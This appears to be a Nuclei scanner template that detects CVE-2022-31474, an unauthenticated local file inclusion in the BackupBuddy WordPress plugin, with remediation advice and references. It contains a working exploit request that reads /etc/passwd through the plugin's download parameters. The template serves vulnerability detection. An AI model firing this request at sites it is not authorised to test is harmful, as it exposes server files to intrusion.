id: CVE-2022-31474

info:
  name: BackupBuddy - Local File Inclusion
  author: aringo
  severity: high
  description: BackupBuddy versions 8.5.8.0 - 8.7.4.1 are vulnerable to a local file inclusion vulnerability via the 'download' and 'local-destination-id' parameters.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the server.
  remediation: Upgrade to at least version 8.7.5 or higher
  reference:
    - https://www.wordfence.com/blog/2022/09/psa-nearly-5-million-attacks-blocked-targeting-0-day-in-backupbuddy-plugin/
    - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy
    - https://ithemes.com/backupbuddy/
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-31474
    - https://ithemes.com/blog/wordpress-vulnerability-report-special-edition-september-6-2022-backupbuddy/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-31474
    cwe-id: CWE-22
    epss-score: 0.0063
    epss-percentile: 0.78579
    cpe: cpe:2.3:a:ithemes:backupbuddy:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: ithemes
    product: backupbuddy
    framework: wordpress
  tags: cve,cve2022,wordpress,wp-plugin,wp,lfi,backupbuddy,ithemes

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f3b5319edec107c66c556a3df41ca603a4b3afc6a104119ee9794eb6fb95b089022100cbc37f3f0be82d71aa22ef578c58eddcdf7d47f986f0caa66205c03de548f8e2:922c64590222798bb761d5b6d8e72950